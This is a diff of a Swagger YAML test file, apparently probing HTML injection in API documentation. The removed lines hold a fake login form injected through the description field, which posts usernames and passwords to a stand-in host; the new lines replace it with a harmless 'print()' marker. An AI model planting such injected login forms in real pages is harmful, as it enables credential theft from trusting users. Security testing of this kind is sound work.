--- a/test.yaml
+++ b/test.yaml
@@ -1,30 +1,14 @@
 swagger: '2.0'
 info:
   version: 1.0.0
-  title: Fake Login Page
-  description: '<div class="login-form">
-    <div class="heading">
-        <h1>HTML Injection : Huthx please login</h1>
+  title: print() Test
+  description: |
+    <div style="border:1px solid #333; padding:10px; margin:10px 0; background:#f4f4f4; font-family:monospace;">
+      print()
     </div>
-    <div class="form-container">
-        <form action="https://example.com/login" method="post" class="form-signin">
-            <div class="form-group">
-                <label for="username">Huthx Username</label>
-                <input type="text" name="username" size="20">
-            </div>
-            <div class="form-group">
-                <label for="password">Huthx Pass</label>
-                <input type="password" name="password" size="20">
-            </div>
-            <div class="form-group">
-                <button type="submit" class="btn btn-default">Login</button>
-            </div>
-        </form>
-    </div>
-</div>'
 paths:
   /:
-    post:
+    get:
       responses:
         '200':
-          description: HUTHX
+          description: OK
